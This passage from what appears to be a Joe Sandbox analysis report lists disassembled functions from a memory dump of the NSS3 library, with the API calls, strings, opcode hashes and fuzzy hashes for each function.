Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 5650152da402876eae7f5472696ef4673cbc9a0280232d917dd106263a5b8279
Instruction ID: 3e64f82219cab482a5ed2d65609f48e4785093b14052f78e066fe3f5cf9af66e
Opcode Fuzzy Hash: 5650152da402876eae7f5472696ef4673cbc9a0280232d917dd106263a5b8279
Instruction Fuzzy Hash: F9116DF1B082415EDB309B5B9A0B762BAE8974731CF542839E416CBF42E775C408DBDA

Function 6C731CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Initialize), ref: 6C731CD8
PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C731CF1

Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E

Strings

C_Initialize, xrefs: 6C731CD3
pInitArgs = 0x%p, xrefs: 6C731CEC

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: pInitArgs = 0x%p$C_Initialize
API String ID: 1907330108-3943720641
Opcode ID: bb4c86408cc4c19151437d9c69669ad8b65a255210bbcadadb53b26840ede6bf
Instruction ID: 05269961eeb17e03bf7bc408a976a90dc5f955d8e8262b5714f0bec3d1d0ecca
Opcode Fuzzy Hash: bb4c86408cc4c19151437d9c69669ad8b65a255210bbcadadb53b26840ede6bf
Instruction Fuzzy Hash: 4501D234206160DFDB219B66DE0DB6533B5ABC335EF046474E40C86A12DB38E849C7D6

Function 6C68A8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C7BA480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C7DC3A2,?,?,00000000,00000000), ref: 6C7BA528
Part of subcall function 6C7BA480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7BA6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68A94F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68A939
database corruption, xrefs: 6C68A943
%s at line %d of [%.10s], xrefs: 6C68A948

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 638864925bbabfc2a4dc75c26b1163ecf786745839e7cd4ba46daad01c9d41c6
Instruction ID: 95ba3ade175b846d92576c276cf38bde3ff163023ac55c356fa274bf8526cc32
Opcode Fuzzy Hash: 638864925bbabfc2a4dc75c26b1163ecf786745839e7cd4ba46daad01c9d41c6
Instruction Fuzzy Hash: F2014931B04218ABCB108A69DD05F9BB3F4AB89318F454939ED5D57B81D771A808C7E5

Function 6C718850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C720715), ref: 6C718859
PR_NewLock.NSS3 ref: 6C718874

Part of subcall function 6C7C98D0: calloc.MOZGLUE(00000001,00000084,6C6F0936,00000001,?,6C6F102C), ref: 6C7C98E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C71888D

Strings

NSS, xrefs: 6C718887

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: d4b59b1ae848beeab12c8cd7c8d1f22f9b6355bdfc1896aa3c81678d6b16c5b9
Instruction ID: a29116a80c4ad841d968eb570d884db6bbfc7fb05f768c6cbccc141cf4992e8f
Opcode Fuzzy Hash: d4b59b1ae848beeab12c8cd7c8d1f22f9b6355bdfc1896aa3c81678d6b16c5b9
Instruction Fuzzy Hash: 0DF0F666E4522137F350216A6E0EB8634885F6275DF090031E90CE7F82EA91951883E3

Function 6C7AA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6C795F25,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AA8A3

Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
Part of subcall function 6C74ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
Part of subcall function 6C74ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
Part of subcall function 6C74ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6C795F25,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AA8BA
SECITEM_ZfreeItem_Util.NSS3(%_yl,00000000,00000000,?,6C795F25,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C7AA8CF

Strings

%_yl, xrefs: 6C7AA894, 6C7AA8CE

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_yl
API String ID: 2877228265-1806763601
Opcode ID: f8b8eb943d1415fc1c9151e7d4ae78df5701bdf556170bc7e08c8ad33ed3bc9f
Instruction ID: 02f9fa24d79ea86bf58ee894a2b110fd00d58da474bfa32af145219a3cdc497a
Opcode Fuzzy Hash: f8b8eb943d1415fc1c9151e7d4ae78df5701bdf556170bc7e08c8ad33ed3bc9f
Instruction Fuzzy Hash: 58F0A0B6A0171457EB119A56E809B977398AB0066DF448034E81A97B01E725E8168FD1

Function 6C78A9F0 Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD074,00000000), ref: 6C78AA23

Part of subcall function 6C77A2F0: PR_SetError.NSS3(00000000,00000000), ref: 6C77A328

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78AB45
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78AB96
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C78ABEA

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Error$Item_Util$CopyZfree
String ID:
API String ID: 3824302834-0
Opcode ID: 8032cf3c8650d8a931cfb501ac11ef629c741aace7dce078aa762bf0bc48aaf6
Instruction ID: 71fbb3f56a4f0c29f7484dae80755498ae20f556b450084a2f98f1be9528c936
Opcode Fuzzy Hash: 8032cf3c8650d8a931cfb501ac11ef629c741aace7dce078aa762bf0bc48aaf6
Instruction Fuzzy Hash: 8C513B31A41219AFEB208B10CF49FE97774FF04718F044170EA086BAC1E775AA94CBD2

Function 6C771D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C771D8F

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C771DA6

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C771E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C771ED0

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: a933f0f40cc8fe090bdb0f3d76e191fc95a1409dce884556a03bad0d3e853679
Instruction ID: dd20e39bd8d5c8d125ce18666e73efbdd844b9df9b91400135df59e343e04d65
Opcode Fuzzy Hash: a933f0f40cc8fe090bdb0f3d76e191fc95a1409dce884556a03bad0d3e853679
Instruction Fuzzy Hash: 01515871A003098FDF20CF98C998BAEB7BABF45309F144129E81D9B651D771E945CBA0

Function 6C6FC9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6C6FCB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6FCB4B
sqlite3_free.NSS3 ref: 6C6FCB70
sqlite3_result_error_nomem.NSS3 ref: 6C6FCB99

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: 4f8fc2a8d4138d8cc0ba825c0218e9c537ecf3c505061c701999ebfa12cdddc1
Instruction ID: 855e86c97ceb6d098ddf2d07fdcad1d8cac249d3faa1bea1c4c702c3d0817ccf
Opcode Fuzzy Hash: 4f8fc2a8d4138d8cc0ba825c0218e9c537ecf3c505061c701999ebfa12cdddc1
Instruction Fuzzy Hash: AE51F332608B45DBC721EF35C44016BF7F2BF86798F104A1DE8E66A950EB31D486C79A

Function 6C78AC80 Relevance: 6.1, APIs: 4, Instructions: 126COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD074,00000000), ref: 6C78AD13
memcmp.VCRUNTIME140(?,?,?), ref: 6C78AD65
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C78AD95
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78ADC8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Item_Util$CopyErrorZfreememcmp
String ID:
API String ID: 2638228310-0
Opcode ID: 22cfcf87488442070db6eff1adb5bd4bdf18be7267c9ca33a3ca27bb8f623cdb
Instruction ID: 156d9fdc7cbd865a8e3e62797126b6b87d4c8e1aefc5e7e258366fd530bf41d7
Opcode Fuzzy Hash: 22cfcf87488442070db6eff1adb5bd4bdf18be7267c9ca33a3ca27bb8f623cdb
Instruction Fuzzy Hash: D241D171A01219ABDB10CB65CD89FEEB3B8EF45328F544134EA04AB685E770A944C7B1

Function 6C7C4FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C6A85D2,00000000,?,?), ref: 6C7C4FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C50C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7C50D6

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 42f15d7c7686216556f3729564d30c02a81a1aba94bc86faee81d36a1c076b9f
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: D3416FB2A402168FCB18CF28DCD179AB7E1BF4531871D4669D84ACBB02E775E891CB81

Function 6C77CF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C77D01E

Part of subcall function 6C74E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C74E5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6C77D055

Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE10
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE24
Part of subcall function 6C74ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C72D079,00000000,00000001), ref: 6C74AE5A
Part of subcall function 6C74ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE6F
Part of subcall function 6C74ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AE7F
Part of subcall function 6C74ADC0: TlsGetValue.KERNEL32(?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEB1
Part of subcall function 6C74ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C72CDBB,?,6C72D079,00000000,00000001), ref: 6C74AEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6C77CC55,00000107,00000000), ref: 6C77D079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C77D08C

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: b6d5496751d6a33a3d6afb676d27b715d0db3898d5bdd53138494973b9be591a
Instruction ID: afee5b105412924c6569e0991de98ad6d823c13534beba34b647a6707aa76b7a
Opcode Fuzzy Hash: b6d5496751d6a33a3d6afb676d27b715d0db3898d5bdd53138494973b9be591a
Instruction Fuzzy Hash: 4E4191B1900219DBEB20CF14CD44BA9F7F5FF44308F0586AAE90CA7741E371A986CBA5

Function 6C81A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C81A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C81A662), ref: 6C81A69E
Part of subcall function 6C81A690: PR_NewCondVar.NSS3(?), ref: 6C81A6B4

PR_IntervalNow.NSS3 ref: 6C81A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C81A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C81A944
PR_SetPollableEvent.NSS3(?), ref: 6C81A94F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 39c58d9fa4ea2248024b24cd056e116b19b10f160859ad924b9c8d15d72645df
Instruction ID: db29ef461d03e26d7d66899ea1dacb40d53d6953efb269f2136154e5657c3c7f
Opcode Fuzzy Hash: 39c58d9fa4ea2248024b24cd056e116b19b10f160859ad924b9c8d15d72645df
Instruction Fuzzy Hash: 794158B0A05A069FC754CF29C680996FBF5FF48318715896AD859CBF11E731F894CB90

Function 6C772C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C771289,?), ref: 6C772D72

Part of subcall function 6C773390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C772CA7,E80C76FF,?,6C771289,?), ref: 6C7733E9
Part of subcall function 6C773390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C77342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C771289,?), ref: 6C772D61

Part of subcall function 6C770B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C770B21
Part of subcall function 6C770B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C770B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C771289,?), ref: 6C772D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C771289,?), ref: 6C772DAF

Part of subcall function 6C72B8F0: PR_CallOnceWithArg.NSS3(6C862178,6C72BCF0,?), ref: 6C72B915
Part of subcall function 6C72B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C72B933
Part of subcall function 6C72B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C72B9C8
Part of subcall function 6C72B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C72B9E1

Part of subcall function 6C770A50: SECOID_GetAlgorithmTag_Util.NSS3(6C772A90,E8571076,?,6C772A7C,6C7721F1,?,?,?,00000000,00000000,?,?,6C7721DD,00000000), ref: 6C770A66

Part of subcall function 6C773310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C772D1E,?,?,?,?,00000000,?,?,?,?,?,6C771289), ref: 6C773348

Part of subcall function 6C7706F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C772E70,00000000), ref: 6C770701

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: fd44e04fa3e99fd5b7a4059976e56658a8e5a4159e616c90aa2a94d32213c3a0
